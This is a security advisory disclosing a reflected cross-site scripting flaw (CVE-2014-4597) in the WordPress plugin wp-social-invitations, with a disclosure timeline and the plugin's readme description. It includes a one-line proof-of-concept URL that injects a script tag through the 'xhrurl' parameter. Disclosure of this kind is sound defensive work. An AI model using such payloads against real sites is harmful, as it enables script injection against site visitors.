wp-plugin : wp-social-invitations – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : wp-social-invitations

 

Effected Version : 1.4.4.2 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://127.0.0.1/wordpress/wp-content/wp-plugs/wp-social-invitations/test.php?xhrurl=xhrurl%27%3E%3Cscript%3Ealert%282%29%3C/script%3E

 

Vulnerable Parameter : xhrurl

 

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=848497%40wp-social-invitations&old=829444%40wp-social-invitations&sfp_email=&sfph_mail=#file239

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Updated on 2014-01-30
 
Public Disclosure : May 28, 2014
 
CVE Number : CVE-2014-4597

 
Plugin Description :
 
Allow your visitors to invite friends of their social networks such as Facebbok, Twitter, Foursquare Google, Yahoo, Hotmail and more directly into your Wordpress site. This plugin works perfectly with Buddypress and Invite Anyone Plugin.

Check the [wsi demo](http://wp.timersys.com/wordpress-social-invitations/?utm_source=wsi-free&utm_medium=readme&utm_campaign=wsi)

Full documentation available in [our site](http://wp.timersys.com/wordpress-social-invitations/docs/?utm_source=wsi-free&utm_medium=readme&utm_campaign=wsi)

= Currently Supported Providers =

Facebook, Twitter, Linkedin, Foursquare, Yahoo, Live, Gmail

= Features =

* HTML emails
* Template system to edit visuals or add your branding
* Invitations Queue to handle the different API limits
* Sidebar widget for sidebars
* Predefined invitation messages
* Custom CSS
* Translation ready
* Documentation

= Premium version =

* Content locker - Share you content only to users that invited their friends by using a simple shortcode
* MyCRED & Cubepoints integration
* Bypass registration lock- To use the plugin on private sites that works with invitation only
* Facebook uses SEND DIALOG
* Linkedin delivers private messages instead of posting into user status
* Twitter delivers Private messages instead of posting a tweet
* GMAIL & SMTP SUPPORT
* Predefined invitations can't be edited by users
* Redirect users after they send invitations
* Change order of providers
* Free Support

Get the premium version on [http://wp.timersys.com/wordpress-social-invitations/](http://wp.timersys.com/wordpress-social-invitations/?utm_source=wsi-free&utm_medium=readme&utm_campaign=wsi)


= Translations Credits =

* Spanish - Eruedados Colombia
* Serbo/Croatian - Borisa Djuraskovic

Leave a Reply

Your email address will not be published. Required fields are marked *